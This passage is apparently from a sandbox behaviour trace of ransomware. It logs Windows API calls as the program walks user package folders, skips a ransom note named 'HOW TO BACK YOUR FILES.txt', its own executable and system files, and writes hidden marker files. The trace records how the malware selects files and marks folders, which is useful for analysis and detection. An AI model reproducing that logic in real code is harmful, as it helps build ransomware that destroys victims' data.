dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0062.260] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0062.261] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0062.261] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0062.261] lstrcpyW (in: lpString1=0x130ebdc, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0062.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0062.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x11e2c0 [0062.261] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x1222e8 [0062.261] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9146357c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223fba5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9146357c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0062.261] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0062.261] lstrcpyW (in: lpString1=0x130ebdc, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0062.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0062.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x11e380 [0062.261] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122068 [0062.261] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91299917, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2240475, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x91299917, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0062.261] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0062.261] lstrcpyW (in: lpString1=0x130ebdc, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0062.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0062.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x123760 [0062.262] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x122128 [0062.262] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9130c033, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2240caa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9130c033, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0062.262] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0062.262] lstrcpyW (in: lpString1=0x130ebdc, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0062.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0062.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x123828 [0062.262] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1220a8 [0062.262] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9154838f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7138b2cd, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0062.262] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0062.262] lstrcpyW (in: lpString1=0x130ebdc, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0062.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0062.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x124d90 [0062.263] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x1222c8 [0062.263] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3e6702, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x6f3e6702, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x6f3e6702, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0062.263] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0062.263] lstrcpyW (in: lpString1=0x130ebdc, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0062.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0062.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x124e50 [0062.263] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x1220c8 [0062.263] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9137e762, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd22d3ee3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9137e762, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0062.263] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0062.263] lstrcpyW (in: lpString1=0x130ebdc, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0062.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0062.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x124f18 [0062.263] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122148 [0062.263] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9137e762, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd22d3ee3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9137e762, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0062.264] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0062.264] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.264] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.265] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.265] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.265] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.265] CloseHandle (hObject=0x298) returned 1 [0062.265] CloseHandle (hObject=0x27c) returned 1 [0062.265] GetCurrentThreadId () returned 0xd98 [0062.265] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0062.265] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState" [0062.265] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124f18 | out: hHeap=0xe0000) returned 1 [0062.265] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0062.265] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState" [0062.265] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\" [0062.265] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0062.266] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.315] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.318] FlushFileBuffers (hFile=0x27c) returned 1 [0062.319] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.319] CloseHandle (hObject=0x27c) returned 1 [0062.319] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState") returned 91 [0062.319] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.319] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9137e762, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd22d3ee3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee784d5e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0062.320] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.320] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.320] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.320] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.320] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9137e762, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd22d3ee3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee784d5e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.320] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.320] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.320] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.320] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.320] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.320] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee784d5e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee784d5e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee784d5e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.320] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.320] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.320] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee784d5e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee784d5e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee784d5e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.320] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0062.320] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.320] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.322] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.322] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.322] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.322] CloseHandle (hObject=0x298) returned 1 [0062.322] CloseHandle (hObject=0x27c) returned 1 [0062.322] GetCurrentThreadId () returned 0xd98 [0062.322] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0062.322] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData" [0062.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124e50 | out: hHeap=0xe0000) returned 1 [0062.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0062.323] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData" [0062.323] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\" [0062.323] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0062.323] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.324] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.327] FlushFileBuffers (hFile=0x27c) returned 1 [0062.328] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.329] CloseHandle (hObject=0x27c) returned 1 [0062.329] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData") returned 95 [0062.329] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.329] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3e6702, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x6f3e6702, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee784d5e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0062.329] lstrcmpiW 